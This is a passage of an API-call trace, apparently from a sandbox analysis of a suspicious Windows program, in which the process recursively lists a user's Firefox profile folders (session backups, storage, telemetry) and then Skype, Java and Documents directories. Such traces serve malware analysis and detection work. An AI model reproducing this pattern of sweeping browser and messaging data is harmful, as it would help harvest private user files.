pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\*" [0251.545] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\*", lpFindFileData=0x235d280 | out: lpFindFileData=0x235d280) returned 0x5c0ee90 [0251.545] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="gmp-gmpopenh264" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264" [0251.545] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\*" [0251.545] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\*", lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0x5c0f850 [0251.545] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264", pszFile="1.6" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6" [0251.545] PathCombineW (in: pszDest=0x235d4d0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\*" [0251.545] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\*", lpFindFileData=0x235d280 | out: lpFindFileData=0x235d280) returned 0x5c0fbb0 [0251.545] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="gmp-widevinecdm" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm" [0251.545] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\*" [0251.545] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\*", lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0x5c0efb0 [0251.545] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm", pszFile="1.4.8.903" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903" [0251.545] PathCombineW (in: pszDest=0x235d4d0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\*" [0251.545] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\*", lpFindFileData=0x235d280 | out: lpFindFileData=0x235d280) returned 0x5c0f850 [0251.547] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="minidumps" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps" [0251.547] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\*" [0251.547] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\*", lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0x5c0f850 [0251.547] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="saved-telemetry-pings" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings" [0251.547] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\*" [0251.547] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\*", lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0x5c0feb0 [0251.547] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="sessionstore-backups" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups" [0251.547] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\*" [0251.547] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\*", lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0x5c0f2b0 [0251.548] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="storage" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage" [0251.548] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\*" [0251.548] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\*", lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0x5c0f2b0 [0251.549] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage", pszFile="permanent" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent" [0251.549] PathCombineW (in: pszDest=0x235d4d0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\*" [0251.549] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\*", lpFindFileData=0x235d280 | out: lpFindFileData=0x235d280) returned 0x5c103f0 [0251.549] PathCombineW (in: pszDest=0x235d4d0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent", pszFile="chrome" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome" [0251.549] PathCombineW (in: pszDest=0x235cff0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\*" [0251.549] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\*", lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 0x5c0ee90 [0251.549] PathCombineW (in: pszDest=0x235cff0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome", pszFile="idb" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb" [0251.549] PathCombineW (in: pszDest=0x235cb10, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\*" [0251.549] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\*", lpFindFileData=0x235c8c0 | out: lpFindFileData=0x235c8c0) returned 0x5c0efb0 [0251.549] PathCombineW (in: pszDest=0x235cb10, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb", pszFile="2918063365piupsah.files" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files" [0251.549] PathCombineW (in: pszDest=0x235c630, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\*" [0251.549] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\*", lpFindFileData=0x235c3e0 | out: lpFindFileData=0x235c3e0) returned 0x5c0f310 [0251.549] PathCombineW (in: pszDest=0x235d4d0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent", pszFile="moz-safe-about+home" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home" [0251.549] PathCombineW (in: pszDest=0x235cff0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\*" [0251.549] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\*", lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 0x5c0feb0 [0251.550] PathCombineW (in: pszDest=0x235cff0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home", pszFile="idb" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb" [0251.550] PathCombineW (in: pszDest=0x235cb10, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\*" [0251.550] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\*", lpFindFileData=0x235c8c0 | out: lpFindFileData=0x235c8c0) returned 0x5c0f850 [0251.550] PathCombineW (in: pszDest=0x235cb10, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb", pszFile="818200132aebmoouht.files" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files" [0251.550] PathCombineW (in: pszDest=0x235c630, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\*" [0251.550] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\*", lpFindFileData=0x235c3e0 | out: lpFindFileData=0x235c3e0) returned 0x5c0ee90 [0251.550] PathCombineW (in: pszDest=0x235c630, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files", pszFile="journals" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals" [0251.550] PathCombineW (in: pszDest=0x235c150, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\*" [0251.550] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\*", lpFindFileData=0x235bf00 | out: lpFindFileData=0x235bf00) returned 0x5c0fbb0 [0251.596] PathCombineW (in: pszDest=0x235f210, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming", pszFile="Skype" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype" [0251.665] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\*" [0251.665] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\*", lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 0x5c0feb0 [0251.666] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype", pszFile="RootTools" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools" [0251.666] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\*" [0251.666] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\RootTools\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5c0f310 [0251.666] PathCombineW (in: pszDest=0x235f210, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming", pszFile="Sun" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun" [0251.666] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\*" [0251.666] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\*", lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 0x5c0f850 [0251.667] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun", pszFile="Java" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java" [0251.667] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\*" [0251.667] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5c103f0 [0251.667] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java", pszFile="Deployment" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment" [0251.667] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\*" [0251.667] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x5c0fbb0 [0251.668] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x235f490 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\Documents") returned 0x0 [0251.668] PathCombineW (in: pszDest=0x235f210, pszDir="C:\\Users\\CIiHmnxMn6Ps\\Documents", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\Documents\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\*" [0251.668] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\*", lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 0x5c0feb0 [0251.668] PathCombineW (in: pszDest=0x235f210, pszDir="C:\\Users\\CIiHmnxMn6Ps\\Documents", pszFile="EHP8OfZ1" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\Documents\\EHP8OfZ1") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\EHP8OfZ1" [0251.668] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\Documents\\EHP8OfZ1", pszFile="*" | out: 